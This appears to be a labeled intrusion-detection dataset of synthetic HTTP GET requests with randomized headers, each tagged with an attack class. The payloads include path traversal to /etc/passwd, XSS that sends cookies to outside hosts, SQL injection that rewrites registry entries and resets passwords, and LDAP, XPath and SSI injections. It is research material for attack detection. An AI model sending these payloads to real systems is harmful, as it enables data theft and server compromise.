GET /yGuueVfyDCW/toturer/dcS/a3/Ucrd5/Gdr/L86paccess_logH-I.Fgroup byB/mVIi3bvM2af0ekB8VrFL.aspx?o8Yqinie=r94+o%7Etd%3Enjawe&Iatcdm4sa1mSCnv=235&tete8stuo=fi+varte&7ooer=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&riobOd0tti=u%5C%25++ewgo%27&GO5Ql%ue7=iphpas+&0Aanrl=8&wtiaeByeae=et&tii=44624&n0sehgmeen=42317&84ooelhqnSYeU=7793874043&Ancoilo=4462459 HTTP/1.0
Host: www.Qeht.st
Connection: nxewec
Accept: image/*
Accept-Charset: isiri-3342;q=0.0, x-mac-ce;q=0.5, x-mac-arabic;q=0.0, hz-gb-2312, macintosh
Accept-Encoding: *
Accept-Language: tsA-2n0
Cache-Control: max-stale
Client-ip: 7.0.64.170
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="16"
Date: Sun, 15 Feb 09 19:29:57 GMT
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: *
If-None-Match: *
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: Digest response="c6cbD7a8F5Ac51D724EE96e3fF8cAa66"
Range: 09106-2,27777-,7807-
Referer: /ewdam/hdktea/nw40he/teroro.swf
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/0.1 (compatible; MSIE 2.6; Solaris; mTKeirsrto; Eelenaotaw; elraohti)
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/7.0 www.lepme.htm, HTTP/3.7 162.134.129.149, 9.8 239.54.217.247
Transfer-Encoding: gzip
Upgrade: otieS/1.0, omtz/5.9, e54a/7.2
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37824
Start - Id: 38547
class: LdapInjection
GET /3NYljL7hwr/c9olHo9xBtANnCG_/lnbeiM3naa/sc5KxzzvLTugej/t4bFw/wGqAdnP-bVQB.pl?0d4or=%29++%28+%7C%28mO0H%3Ddh*%29&isleipamMph=e%5Cdf7&0tshhgconu2nwc=41164440 HTTP/1.0
Host: 117.168.23.198:7
Connection: uO2s
Accept: */*;q=0.3
Accept-Charset: x-mac-hebrew;q=0.0, iso-8859-8-i;q=0.3, windows-1250, shift_jis;q=0.8, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=25767
Client-ip: 137.169.169.214
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="697"
Date: Thu, 28 Dec 06 01:29:12 UTC
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: 100-continue
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 29 Jun 09 13:04:30 GMT
If-Unmodified-Since: Fri, 09 Nov 07 09:51:35 CET
If-Match: "dHOK8wv@qaAmD66"
If-None-Match: *
If-Range: Fri, 10 Feb 06 03:23:18 CET
Max-Forwards: 7726
MIME-Version: 2.4
Pragma: e='mxyeef'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest cnonce="aipuncn4"
Range: 447-,158917-
Referer: http://lttiizy.be/0nfntsfi/9lsouLR/rZaaj9/oeeyne.php3
TE: gzip
Trailer: If-Range
User-Agent: ldjoeeot (tXQTfrWD65; 21N03L; ekEX74; e0jaTPk)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: HTTP/1.4 5.147.77.143, HTTP/3.6 35.117.154.81, FTP/4.6 www.os8e.htm
Transfer-Encoding: deflate
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38547
Start - Id: 46415
class: PathTransversal
GET /arom9htti/xammesySaO7ura6st/t_Y6ZUCk-5f_MUi_Ay6l/ndOhee009oeo4lwadchi/iiSwsxrshAwto/kformZTPxW/k4dAdoee/kdp.mspx?iyemzsgoptpb=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&Raki=Osfy8suxhtaccesRxml%27%27s HTTP/1.1
Host: www.4oytSefps.cz:80
Connection: keep-alive
Accept: audio/basic;q=0.5, text/*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.1, x-mac-roman;q=0.2, iso-8859-2, iso-10646-ucs-2, x-mac-chinesetrad
Accept-Encoding: compress, deflate;q=0.2, deflate
Accept-Language: *
Cache-Control: eir6='rhhLs8c'
Client-ip: 81.141.227.75
Cookie: n8=kr2m
Cookie2: $Version="1"
Date: Fri, 05 May 06 02:49:17 UTC
ETag: "7F80YTH_JJbucQ6@88o"
Expect: tFohG3=hic181ot;uotroo=oietD8
If-Unmodified-Since: Sun, 08 Feb 09 14:50:49 CET
If-Match: "5ZDOH8X.lQ.HddPJ75mD"
If-None-Match: *
Max-Forwards: 6
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic Yko1MG9kOmVpaG5w
Authorization: l2Xanh 5tpe=n7aj
Referer: /On46np/uloasme/OecdrFa/ouds/8euho.ace
TE: chunked;q=0.1,trailers,trailers
User-Agent: mhjt (9HVKvQC)
UA-CPU: PowerPC
Via: vguz4o/4.3 www.honA0rw.css
Transfer-Encoding: deflate
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157
----: ----------------------------------------

null

End - Id: 46415
Start - Id: 48755
class: XPathInjection
GET /1d./vC@l5mkjRlc5x/nSAml9XLOfsE6qd/oP02mnrQLxPKGbfAjDU.shtml?1r=6&ghemene1Onsteb=829194&oasend2H=ilEUz&oe=6831480&ksTtamahA=n.FNtidj&ckcjsdnhghae=sn&_Fo29ugDA2LJ=%28i++++%3C+++count%28ey%2Fchild%3A%3Atext%28%29%29+and+++++j++%3C+++count%281r%2Fchild%3A%3Acomment%28%29%29+++and++k+++++%3C+++count%28aedx%2Fchild%3A%3A*%29+%29&ueeheusU9iaiwm=tFFYb&N1rp-c2E21@=du+W&naues=68643 HTTP/1.1
Host: 78.48.82.201:1
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: Rssao-19t0ye
Cache-Control: only-if-cached
Client-ip: 7.62.30.104
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Tue, 25 Jan 05 22:31:34 CET
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Sat, 18 Sep 04 02:51:31 GMT
If-Match: *
If-None-Match: "vul-SnuSJuwDJ@dJU"
If-Range: "gej4gF6yO.Xbhg4"
Max-Forwards: 779
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -9
Referer: /gOkaat85/Dns9t2/tnen/xbowwato.mp3
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 1.4; tE-t5; rv:5.5.4) Gecko/77121327
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 803 11.197.109.145 "LruslrncTctzsslyIpro" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48755
Start - Id: 48302
class: XPathInjection
GET /ylg6L-_DNN.php?Tt=includeTMe&dfMqapryggdOiqh=637&o9l2naiayxmouoy=%28cdO%5B&gaziqd=6918007910&deeidr9NIaKgrEy=9067 HTTP/1.1
Host: www.ho7enif.org
Connection: wwj9ldu
Accept: audio/basic;q=0.7, audio/basic;q=0.2, audio/*;q=0.1
Accept-Charset: windows-1251, shift_jis;q=0.8, x-mac-ce;q=0.2, x-mac-chinesetrad;q=0.3, iso-8859-9
Accept-Encoding: *
Accept-Language: toymnNh1-ohsah;q=0.3
Cache-Control: max-age=540
Client-ip: 137.0.56.189
Cookie: u8Ldfan=5ewiq;hEmsdtn6=eoMTT1;0twwsnduep=42690;r5oblheoasf=v7b
Cookie2: $Version="81"
Date: Thu, 26 Jan 06 16:11:25 GMT
ETag: "eerlUYtS7n--gSm11ozn"
Expect: snoiTjo1=irrdax
From: mSrf3p@empeero.de
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Sun, 28 Dec 08 18:19:05 GMT
If-Match: "xMSLdiGN1HBB@LG@_"
If-None-Match: "8McCqQlFVeqvXeaS.n"
If-Range: Fri, 09 Jun 06 14:15:31 CET
Max-Forwards: 26
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: l3mee aaieteal=Eacttno
Referer: http://www.sibuYao.ch/etsatsn.mp3
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: T/c/lmse/child::node()[position()=654]     or  'om87ru'   =   '
UA-Disp: 161,1188,16
UA-Pixels: 433x249
Via: 3.9 41.45.211.226, 3.6 113.101.31.141:24, FTP/9.7 www.oodl4nr.js:350
Transfer-Encoding: deflate
Upgrade: e0ePs/3.7, eids5/6.0, aacr/1.5, dsm/2.6, Stu/3.2
Warning: 302 12.139.124.62 "qfuhcmikee7d" 
X-Forwarded-For: 145.155.0.124
X-Serial-Number: 280773843
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48302
Start - Id: 46638
class: XSS
GET /enrte5s8hi/tataswcrr3d/ijHA@p_tU/dTeseowfad/67O/trehsfasulasg/roelardbcva/MtmpRTgW/aslxrc/passthruaAy4lVOservices.js?i7cemrnuaE=37471688&Xp6i=tB5GU7hlwv&qr=g2rcesc&mhuAd=53243805&4dLwvxlie=xeeexecn%29php8n&h3rqiuneeh=72&are=ylaeYxt10ocgreRma&oaoti2jrLteeo=ocoocmd&n6emuqiNfbowbi=clWTSdX_fvX&mteno=ttiwbtveadon&rsE=am+frioee0n%3D&ppiCoheinmgnbne=18025635 HTTP/1.0
Host: www.eiEe.be:80
Connection: yh0asi
Accept: */*;q=0.4
Accept-Charset: isiri-3342;q=0.7, windows-1254;q=0.4, windows-1254;q=0.1, iso-8859-3;q=0.9
Accept-Encoding: <object     classid  ="   clsid:...   " codebase =    "javascript:    [window.open('http://149.216.117.198/larare.jsp'+document.cookie);]     "   >
Accept-Language: irenee-egqsj
Cache-Control: no-store
Client-ip: 60.184.83.104
Cookie: e0mhldu1kw5eme=vbse<Ne;Lmrehomop8Ta=u3e;nse7uhttrfMazi8=pmy rRR+flssM
Cookie2: $Version="943"
Date: Mon, 03 Aug 09 01:04:10 GMT
ETag: W/"EH3TK2WBSeCrrP1S"
Expect: reChrjl
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 26 Jan 04 02:55:16 GMT
If-Unmodified-Since: Tue, 20 May 08 21:53:50 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 21:12:28 GMT
Max-Forwards: 13
MIME-Version: 7.9
Pragma: noNokth=t8
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic dHRCbm9uOmloMjRtVGVl
Range: 118-482,-132
Referer: http://SYnoh.fr/asIs9oc/la6b/Osxs/9t4wS/w0Nie9.tar
TE: gzip;q=0.3,trailers
Trailer: Via
User-Agent: <img src=&{[document.location.replace    ('http://www.esta.com/cgi-bin/ic.cgi'+document.cookie);]};   >
UA-CPU: PowerPC
UA-Pixels: 4819x5235
Via: 0.7 163.142.1.108
Transfer-Encoding: compress
Upgrade: Ecza/9.5
Warning: 274 234.103.99.211 "otEEOe5Kno" "Sun, 01 Jul 07 17:52:41 UTC"
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46638
Start - Id: 44671
class: PathTransversal
GET /aegydyj/e78e4eeTnklrfososgim/1AgLIlinkHmS4yA3@.php4?keyewghTdNmotp=1&b7lceaosoEdPws=157&nyy3=4592165&yGKYKO=entscriptexec&lTXm=fZv&9lprerusd=58068607&VZK4delete_9Vcn=94899&FyFIK3pAO=tu+ure%2FNr&3jfoyLtegd=aenlzaSEmlnfbsiob HTTP/1.1
Host: www.s0pldi7e.uk
Connection: ca14r
Accept: */*;q=0.3
Accept-Charset: cp-932
Accept-Encoding: deflate, gzip;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 181.123.183.21
Cookie: 5te=oO7mjtycrUtrrw;ta=pdtt;harqUtateu4otp=collection(file:///c:/nerv4/rid.xml );ek=5296882;aywoemustns=:'
Cookie2: $Version="132"
Date: Sat, 17 Apr 10 10:00:16 UTC
ETag: W/"ZPtdydKjD0o8GzDZSp"
Expect: hjir=edwNge;asd0sezv
From: esO7ean@to9rgrv.org
If-Modified-Since: Wed, 07 May 08 24:58:59 CET
If-Unmodified-Since: Fri, 03 Jul 09 05:07:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jan 07 21:29:09 GMT
Max-Forwards: 779
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: Digest algorithm=MD5-sess
Range: -9,446-879,-43250
Referer: http://www.liscr.fr/i5Teu.php4
TE: chunked,trailers
User-Agent: ftvhoUeada/2.0.3
UA-Disp: 2213,7553,16
UA-OS: WinNT
UA-Pixels: 0638x7767
Via: 9.8 www.qiyU.gif, FTP/1.5 134.144.103.89
Transfer-Encoding: identity
Upgrade: tvmai/7.6, 6reo/8.5, nstpt/2.4, yeianr/0.7
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540
----: ----------------------------------------

null

End - Id: 44671
Start - Id: 41070
class: SqlInjection
GET /rosnnamdeO0ithoe/rjrn1udm6aarw/oyddft3ehuvtountl/iI/o2x_8Nh@Vv/xt.gif?gfarteoOGRanlo=d83&bgsound@JT679=exec+xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ll2her%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&ptcducadvjdAuo=nEeeb&pelilh=32&jdegbee=bezeaes&svtRci0ne=548&aLtOnntnpt=yvOhnsiriytvhdlNw&4rrOaalsea2=4cZUXCO&sbeosobzgs=4778629&unRrpe8eerrmei=646 HTTP/1.0
Host: 14.182.201.11
Connection: rfi1ci
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate
Accept-Language: ffss-0e, zhsldant-istn, xf3cb0P-ada;q=0.0, sat-a5w;q=0.5, N4ceem-c9amy
Cache-Control: no-cache
Client-ip: 26.111.242.56
Cookie: txhettrjhvng6o9=429390299;enb=hc7p>1rel2ooit;inhis3e=hacj s[mmfsystemap  tt);4pzal4oiEatewt=satbu3on9;mailA3logBpTVhtpassOal= rs%;A5RSrm5Pl.=ieaeaseaectiltesd
Cookie2: $Version="049"
Date: Thu, 15 Sep 05 20:54:18 GMT
ETag: W/"sUM3EPCj2Sen4b.1UGp-"
Expect: 100-continue
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Thu, 11 Mar 04 15:47:41 UTC
If-Unmodified-Since: Wed, 18 May 05 09:40:38 UTC
If-Match: "pwn5gxFi5EmwbP7"
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 549
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM bWVzRGVua2F3c2xpYXNobm5obWFueU9hN3lwdHRsaWN0dA==
Range: -4
Referer: http://www.unsthRmb.ch/jTmoAO/reairdz3/lme54aF/tIph/beioat.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.2 (X11; U; Solaris 8.4; be-io; rv:1.3.0) Gecko/14333017
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: 4.3 135.250.9.108, HTTP/9.2 188.112.15.103
Transfer-Encoding: os5Ete; lctSt=fwwht
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41070
Start - Id: 49633
class: XPathInjection
GET /lsystemCDNtoocQS.swf?fitt5zusos=olD&Smone=6T&ilI=tii&TlitErdseOrca=adleiframet&iv4t=h9S&tuntii6s=559&Xx0bn4=Rr6aAOelaaihsp&dndhmhn=6ocji&u2=iEn1rf%2For%2Fhus%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D945%5D++or++++%27wCe%27++%3D+++%27&olrVsTVa1U5fp=28 HTTP/1.0
Host: 193.154.193.153:80
Connection: close
Accept: application/*
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: 8ynE-ghno;q=0.9, snohgrt-ed, ytxp2-otij;q=0.9, g-sie
Cache-Control: max-stale
Client-ip: 77.18.73.164
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Sun, 10 Jan 10 15:36:31 CET
ETag: "oaaS6UjlvBpJfRDrhU"
Expect: 100-continue
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Fri, 13 Apr 07 14:00:27 UTC
If-Unmodified-Since: Wed, 09 Apr 08 09:03:27 CET
If-Match: "qfAA7nJNkKFk.8b31.s"
If-None-Match: "9I-KN992UTWIsHB0t"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.0
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: NTLM aWNzdTJlenVtc2FmZHVwcmhpMG90ZWF0M3I1cm9lZXI=
Range: 31-025167,936-84
Referer: /9bto/migirs/iqbqbm/7tie5.doc
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.9 (compatible; MSIE 9.1; Mac OS X; lcegsnteit; onnish0m)
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3223x940
Via: 5.1 www.wogc.jpeg
Transfer-Encoding: compress
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49633
Start - Id: 37395
class: LdapInjection
GET /p@7sJ4NH8y/ifIV8G_2jdpjmM8qH/i-Iba2FJj/akJYOj7vD4LhuZ3GP2/zlrnAonhshtsSIetise/khO1z8bOL/0afeagaiE/pnivnbOlesvoEc8te.swf?jeaiu1wrnnntnti=5PZVWg173D1&8bd3paLtaiim57t=oa2adt4n&sgatsir9P=026202163&dCocblJTFmrtrm=5r.-B HTTP/1.1
Host: 156.65.101.252
Connection: ewsco1
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: )  (   |(    cn=*o   'brien*)(mail   =*o  'brien* )  
Accept-Language: *
ETag: "vHsbEs@C-4CxSbK"
If-Match: "G5iffFO@TRRC3Yc"
If-None-Match: *
Authorization: 1sgean oydxe=bone
Referer: /Mqrit/Wshro/tgoh/rcSssot.mspx
User-Agent: 3imecn0/1.8.0.0.9
UA-Disp: 8549,0144,8

null

End - Id: 37395
Start - Id: 35043
class: SqlInjection
GET /demrmlj/aNsaL/bP8iPND5/3vgroup byeK5A48DS/iaasnmvwetaslicssehr/JSQi6/fGpuaFZ6Z/qzTiRxzZII40d-CUt/vt@4XpOWr/iQ1fQKANUnrxz.pl?eokeeoepf=ezosm&drsouonhnx4g=heknaTop&tbaNf3oa=ddqhi&9o7qee0ofe=4arn6ne6p&mmago=bulk+++++insert+5ctc++from+%27pwdump.exe%27+++with++++%28codepage%3D%27RAW%27+%29&UBVR=1943477885&ateNfr3bof=3r8evrua&enode2-agB=4537879 HTTP/1.0
Host: www.eLfOS1rde7.biz
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: jr-Oir, pn7xhfR-o0, oAc-olcaee;q=0.1, e-ssLmU;q=0.9, o-Zc;q=0.4
Cache-Control: no-transform
Client-ip: 175.67.198.190
Cookie: Zbrbi=rtheeo\eimz;cwiemlinose=otheeT;ypyDniae2Oitk=bmoseibtixtermr;zsnkedqSmeju=eQWV6.Hef
Date: Tue, 21 Jun 05 09:01:10 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Sun, 13 Sep 09 06:34:07 UTC
If-Unmodified-Since: Wed, 05 Jan 05 16:51:01 CET
If-Match: "@E7Ef4CY-tUdMPWb1R5"
If-None-Match: "GKtrY63.V_2TGqIQgc5"
If-Range: *
Max-Forwards: 9872
MIME-Version: 0.3
Pragma: eu='rpnsaahi'
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZWJycW5uOmVlYmlZa3Q=
Range: -373777
Referer: http://www.tuerno.fr/htIVHre/lath/reettWfe.msf
TE: trailers
User-Agent: aiascnonmuei
UA-CPU: StrongARM
UA-Color: color32
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: deflate
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35043
Start - Id: 40629
class: SSI
GET /rbnhcoo2ereia/x7fasiapwe38pt.bin?H6m1imeipt=985&Kwindow.opentfromg.6=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&dcytnttesD=0124&lrtetsn=owhL&1ll9euxim=145520&kretRy7=Ulowsf&yC=91741103&utqiu9e=isaKp%5Dh&wauot0rln=0266&ugd6nqwi=8875456 HTTP/1.1
Host: 151.99.88.251:3493
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: n=t
Client-ip: 90.139.110.154
Cookie: rraoo=22520
Cookie2: $Version="00"
Date: Thu, 03 Apr 08 05:09:07 CET
ETag: "7VJuCsYpLjlxhDcl"
Expect: 100-continue
From: 0huf@noaNaeeh.cz
If-Modified-Since: Fri, 30 May 08 18:45:26 UTC
If-Unmodified-Since: Tue, 21 Feb 06 02:46:03 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Dec 04 24:39:31 GMT
Max-Forwards: 813
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: sazlte neuhunTs=Hdeoarhe
Authorization: Digest response="Ff9EC2B1e9fE4DADB141B3f349Fb2BAF"
Range: -916,268-761609,54-38396
Referer: http://www.nedlv.net/uhsntn4n/rttel/fa8h.php
TE: trailers
Trailer: If-Match
User-Agent: whurhou/7.0.8.1.0
UA-Disp: 959,926,32
UA-OS: Win9x
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: deflate
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 793 www.tAdehm.html "tqeeqiTsmsat" "Sat, 08 Apr 06 21:20:58 GMT"
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40629
Start - Id: 36976
class: LdapInjection
GET /sQTO@Z3YOj8jy/snoeway.cgi?manon9gaclhgs=XshT%3A&0iRZww1lTQ=28458705&ntefmr=350862255&ytrz=1206&ByCrhognwMatt=1&ojcLodcRdegt=esn14%29%28%7C++++%28nxex%3D*%29 HTTP/1.1
Host: 101.255.57.138:80
Connection: ltKnds
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-age=22
Client-ip: 58.176.85.89
Cookie: IuofcTaoq=0415;nEOt=eefee4ud
Cookie2: $Version="595"
Date: Fri, 04 Feb 05 05:12:40 GMT
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Thu, 11 Aug 05 06:34:58 UTC
If-Unmodified-Since: Tue, 09 Nov 04 08:50:04 UTC
If-Match: *
If-None-Match: *
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 761
MIME-Version: 3.4
Pragma: ger6ay='4e'
Proxy-Authorization: dakr8 nhu1=fhnr
Authorization: iaoa Chtl=eodnuiy
Range: 84-,-422477,1197-5319
Referer: http://eohssito.org/iienrU.png
TE: gzip;q=0.1,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (X11; U; Linux i386 4.7; ck-j1; rv:0.8.6) Gecko/59152436
UA-CPU: StrongARM
UA-Disp: 2036,1499,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: eel4bi; eesNp=0tGeir
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36976
Start - Id: 42178
class: SqlInjection
GET /geqabhio/NWkLuopenEfERandM/open_UE.KpO6/g1o/bcjq/eVOYu8h-F00Z0mS/ogbAXynlRvc/tyK2.WEja_olAXkYvom-/gn/du75eqWlCKX/zo8croseeeid1E/eaQ.asp?2CsmochaV9_=nofd&sjueda=lsnhm&o3wi83=%3Balter+++++table+geseieitil+++set+++++password++++%3D+++%27bion1%27+++++where+++++name+++%3D+++%27d09%27%3B&km=9757028009&Iafsa4tayae=aerhlotco&iq9fwe=cr+ HTTP/1.1
Host: 186.10.151.126
Connection: tro6fu
Accept: image/jpeg;q=0.4, image/png;q=0.2, video/*;q=0.3
Accept-Charset: x-mac-roman;q=0.2, big5;q=0.1, gb2312;q=0.2, x-mac-greek;q=0.6, iso-8859-5;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=67
Client-ip: 171.126.113.10
Cookie: oeto1a=ctlu3rldhft;@2bC9K2r=08411217
Cookie2: $Version="85"
Date: Thu, 28 May 09 15:29:31 UTC
ETag: W/"NGLysbC8Lx4iZGnoq6"
Expect: 100-continue
From: hmrl@wdteioa4s.uk
If-Modified-Since: Sun, 08 Oct 06 22:04:35 CET
If-Unmodified-Since: Thu, 05 May 05 17:06:57 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: "2H3y0Q_oN_0.Ij3xIz"
If-Range: Sun, 04 Jul 04 05:28:37 UTC
Max-Forwards: 737
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic ZWltZWFtb1Q6MmFiaWF3RWU=
Range: 1010-
Referer: http://www.icep.biz/hui8A.doc
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: nzU6nu. http://www.stCv8axv.st
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 249x8623
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: S1cuf; hfirpp=hiiopmg
Upgrade: amt/4.2, wwaier/5.7, iaqR/1.4
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42178
Start - Id: 35212
class: SqlInjection
